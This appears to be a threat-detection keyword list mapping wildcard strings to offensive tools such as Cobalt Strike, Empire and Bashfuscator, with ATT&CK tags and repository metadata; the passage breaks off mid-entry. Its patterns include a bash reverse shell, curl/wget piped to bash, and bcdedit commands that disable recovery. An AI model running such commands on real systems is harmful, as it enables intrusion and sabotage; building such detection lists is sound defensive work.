-*base64_conversion_commands.ps1*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense 
Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*base64_conversion_commands.ps1*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*bash -c *curl *.sh | bash*,greyware_tool_keyword,bash,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*bash -c *wget *.sh | bash*,greyware_tool_keyword,bash,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*bash -i >& /dev/tcp/*/* 0>&1*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*bash -i >& /dev/tcp/*/* 0>&1*,greyware_tool_keyword,bash,bash reverse shell,T1071 - T1071.004 - T1021,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*bash lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege 
escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*bash_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*bash_read_line_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*bashfuscator -*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*Bashfuscator Team*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*bashfuscator.py*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/Bashfuscator/Bashfuscator,1,1,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*Bashfuscator-master*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,1,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*BasicServiceExploit.class*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*BastilleResearch*,offensive_tool_keyword,Github Username,Open source testing tools for the SDR & security community,T1179 - T1141 - T1142 - T1143,TA0011 - ,N/A,N/A,Exploitation tools,https://github.com/BastilleResearch,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--batch --dump -T *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*Bates.exe --kill*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*Bates.exe --listen*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*bats3c/ADCSPwn*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege 
Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*bats3c/darkarmour*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*bats3c/DarkLoadLibrary*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,1,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*bats3c/EvtMute*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*bawait_upload*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bawait_upload_raw*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bb3b1a1f-0447-42a6-955a-88681fb88499*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation 
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*bblcccknbdbplgmdjnnikffefhdlobhp*,greyware_tool_keyword,FastStunnel VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bblockdlls*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bbrowserpivot*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bbrowserpivot*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bbypassuac*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bc3023b36063a7681db24681472b54fa11f0d4ec*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*bcc2_setenv*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike 
framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bcc2_spawn*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bcdedit* /set {default} bootstatuspolicy ignoreallfailures*,greyware_tool_keyword,bcdedit,Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. 
adversaries can evade detection and potentially maintain access to the system even after reboots.,T1218.004 - T1562.001,TA0007 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*bcdedit* /set {default} recoveryenabled No*,greyware_tool_keyword,bcdedit,Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.,T1218.004 - T1562.001,TA0007 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*bcdedit.exe /set {default} recoveryenabled No*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BCHASH-Rijndael-128.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*BCHASH-Rijndael-256.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*bcrossc2_load_dyn*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform 
payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*BC-SECURITY*,offensive_tool_keyword,Github Username,Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.,T1021 - T1024 - T1027 - T1059 - T1074 - T1053,TA0008 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BC-SECURITY,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BC-SECURITY*Malleable*,offensive_tool_keyword,cobaltstrike,Malleable C2 Profiles. 
A collection of profiles used in different projects using Cobalt Strike & Empire.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*bc-security/empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - 
T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*BC-SECURITY/Starkiller*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - 